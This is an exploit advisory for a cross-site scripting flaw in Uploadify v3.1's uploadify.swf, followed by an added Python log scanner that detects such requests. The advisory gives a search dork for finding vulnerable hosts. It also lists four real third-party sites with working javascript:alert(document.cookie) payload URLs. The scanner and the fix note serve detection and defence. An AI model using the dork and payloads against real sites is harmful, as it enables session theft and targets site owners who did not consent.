===============================
Title : Uploadify v3.1 XSS Vulnerability
# Date: 2013-09-1
# Software Link:
# Found by: ''Master Zombie''
# Tested on: Windows XP SP3
# Category: [webapps]
# Dork : inurl:admin/include/uploadify
===============================
Exploit path:
http://127.0.0.1/admin/include/uploadify/uploadify.swf?buttonText=<a href=[ XSS ]
Demo Sites :
http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
http://photos.davidandginny.co.uk/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
http://landevejsridder.dk/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
http://massecritique.agora.eu.org/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
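
Added example (not part of the original advisory): a defender-side check that scans web server access logs for requests to uploadify.swf whose buttonText parameter carries markup or a javascript: URL, as in the exploit path above. The combined log format, the sample lines and all function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# A button label should be plain text: flag tags, javascript: URLs, on*= handlers.
SUSPICIOUS_RE = re.compile(r"<\s*\w|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so %253C is treated like '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_line(line):
    """Return the decoded buttonText of a suspicious request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/uploadify.swf"):
        return None
    query = parse_qs(target.query, keep_blank_values=True)
    values = [v for k, vs in query.items() if k.lower() == "buttontext" for v in vs]
    for text in map(decode_fully, values):
        if SUSPICIOUS_RE.search(text):
            return text
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    flagged = ((n, flag_line(line)) for n, line in enumerate(lines, 1))
    return [(n, text) for n, text in flagged if text is not None]

# Constructed sample log lines (documentation IPs, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Sep/2013:10:00:01 +0000] "GET /admin/include/uploadify/uploadify.swf?buttonText=Select%20Files HTTP/1.1" 200 12345
192.0.2.44 - - [01/Sep/2013:10:02:17 +0000] "GET /admin/include/uploadify/uploadify.swf?buttonText=%3Ca%20href='javascript:alert(document.cookie)'%3EW-P%3C/a%3E HTTP/1.1" 200 12345
192.0.2.45 - - [01/Sep/2013:10:03:40 +0000] "GET /piwigo/admin/include/uploadify/uploadify.swf?BUTTONTEXT=%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 12345
192.0.2.46 - - [01/Sep/2013:10:04:02 +0000] "GET /index.php?buttonText=%3Cb%3E HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    for number, text in scan(SAMPLE_LOG):
        print(f"line {number}: buttonText={text!r}")
```

A hit only shows that someone requested the SWF with markup in the label. The fix itself is to remove or update the bundled uploadify.swf.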